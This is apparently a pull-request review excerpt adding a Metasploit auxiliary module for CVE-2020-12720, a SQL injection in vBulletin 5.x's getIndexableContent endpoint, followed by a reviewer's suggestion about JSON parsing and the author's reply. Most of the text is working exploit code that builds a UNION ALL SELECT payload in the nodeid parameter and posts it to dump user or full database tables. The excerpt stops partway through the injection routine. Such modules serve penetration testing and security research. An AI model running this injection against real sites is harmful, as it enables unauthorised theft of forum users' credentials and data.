modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.rb

```diff
@@ -0,0 +1,286 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+
+  HttpFingerprint = { method: 'GET', uri: '/', pattern: [/vBulletin.version = '5.+'/] }
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'vBulletin /ajax/api/content_infraction/getIndexableContent nodeid Parameter SQL Injection',
+        'Description' => %q{
+          This module exploits a SQL injection vulnerability found in vBulletin 5.x.x to dump the user
+          table information or to dump all of the vBulletin tables (based on the selected options). This
+          module has been tested successfully on VBulletin Version 5.6.1 on Ubuntu Linux.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Charles Fol <folcharles[at]gmail.com>', # (@cfreal_) CVE
+          'Zenofex <zenofex[at]exploitee.rs>', # (@zenofex) PoC and Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2020-12720'],
+        ],
+        'Platform' => 'php',
+        'Arch' => ARCH_PHP,
+        'Targets' => [
+          [ 'Automatic', {}]
+        ],
+        'Privileged' => false,
+        'Payload' => {},
+        'DisclosureDate' => 'Mar 12 2020',
+        'DefaultTarget' => 0
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to vBulletin', '/']),
+      OptInt.new('NODE', [false, 'Valid Node ID']),
+      OptInt.new('MINNODE', [true, 'Valid Node ID', 1]),
+      OptInt.new('MAXNODE', [true, 'Valid Node ID', 200]),
+      OptBool.new('DUMPALL', [true, 'Dump all tables', false]),
+    ])
+  end
+
+  # Performs SQLi attack
+  def do_sqli(node_id, tbl_prfx, field, table, condition = nil, limit = nil)
+    where_cond = condition.nil? || condition == '' ? '' : "where #{condition}"
+    limit_cond = limit.nil? || limit == '' ? '' : "limit #{limit}"
+    injection = " UNION ALL SELECT 0x2E,0x74,0x68,0x65,0x2E,0x65,0x78,0x70,0x6C,0x6F,0x69,0x74,0x65,0x65,0x72,0x73,0x2E,#{field},0x2E,0x7A,0x65,0x6E,0x6F,0x66,0x65,0x78 "
+    injection << "from #{tbl_prfx}#{table} #{where_cond} #{limit_cond} --"
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'ajax', 'api', 'content_infraction', 'getIndexableContent'),
+      'vars_post' => {
+        'nodeId[nodeid]' => "#{node_id}#{injection}"
+      }
+    })
+
+    unless res && res.code == 200
+      return nil
+    end
+
+    parsed_resp = JSON.parse(res.body.to_s)
```

Comment:
You may use `res.get_json_document` here and elsewhere, and it will `rescue JSON::ParserError`.

Reply:
Alright, changed every used of JSON.parse to res.get_json_document then did a bunch of testing. Thank you!